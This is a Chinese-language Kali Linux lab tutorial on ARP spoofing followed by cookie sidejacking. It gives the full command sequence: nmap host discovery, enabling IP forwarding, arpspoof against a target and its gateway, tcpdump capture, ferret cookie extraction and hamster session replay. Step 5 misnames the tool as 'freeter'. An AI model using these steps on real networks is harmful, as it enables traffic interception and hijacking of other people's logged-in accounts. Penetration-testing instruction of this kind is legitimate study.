一.环境搭建
Tips: 使用Kali Linux,下列工具中只需要下载ferret即可,其它工具均默认安装
1.下载arpspoof
apt install dsniff
2.下载ferret
软件介绍:
网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac地址、主机名、操作类型、网址、传递的参数等。通过这些信息,用户可以更为快速的了解到用户进行的操作和传输的关键信息。
dpkg --add-architecture i386 #增加i386 x32位软件架构
apt-get clean
apt-get update
sudo apt install ferret-sidejack:i386
3.下载hamster
软件介绍:
Session side jacking是会话劫持(session hijacking)方式的一种。实现方式为,渗透测试人员通过嗅探客户端和服务器之间的数据,获取会话的cookie。然后利用该cookie,以该cookie的所有者身份访问服务器,以获得相应的数据。 Kali Linux提供对应的工具hamster-sidejack。该工具把提取cookie和利用cookie整合在一起,简化渗透测试人员的操作。渗透测试人员只需要通过中间人攻击截取流量,然后设置HTTP代理,就可以在本机浏览器中获取cookie,并直接利用。
wget http://http.kali.org/pool/main/h/hamster-sidejack/hamster-sidejack_2.0-1kali4_amd64.deb
dpkg -i hamster-sidejack_2.0-1kali4_amd64.deb
二.开始ARP欺骗进行引流
1.查找目标机
ifconfig #查看自己的网卡,IP和网关
nmap -sP 192.168.137.0/24 #查看局域网内的所有IP并记住一个目标机的IP
这里我的网关为192.168.137.2,目标IP为192.168.137.222
2.开启流量转发
cat /proc/sys/net/ipv4/ip_forward # 查看流量转发是否打开,0是未打开,1是打开
echo 1 > /proc/sys/net/ipv4/ip_forward #如果流量转发未打开,则输入下面的命令打开,目的是将流量引到Kali后,确认能进行正常的流量中转
3.开始ARP欺骗
arpspoof -i 网卡 -t 目标机IP 网关
arpspoof -i eth0 -t 192.168.137.222 192.168.137.2
4.在Kali上进行抓包
使用tcpdump进行抓包
tcpdump -i eth0 -w ./cookie.pcap #-i 自己的网卡,-w保存文件名字。pcap后缀名
5.使用freeter工具重写
freeter -r cookie.pcap -w hamster.txt
6.开启hamster进行Cookie重放
启动hamster工具
hamster
7.开启浏览器代理
然后登录网页http://127.0.0.1:1234或者http://hamster即可
即可以成功登录目标主机访问的页面,并且能直接拿到对方的登录权限。
至此,实验完成,撒花!
参考文档: https://blog.csdn.net/qq_44693903/article/details/90115202
|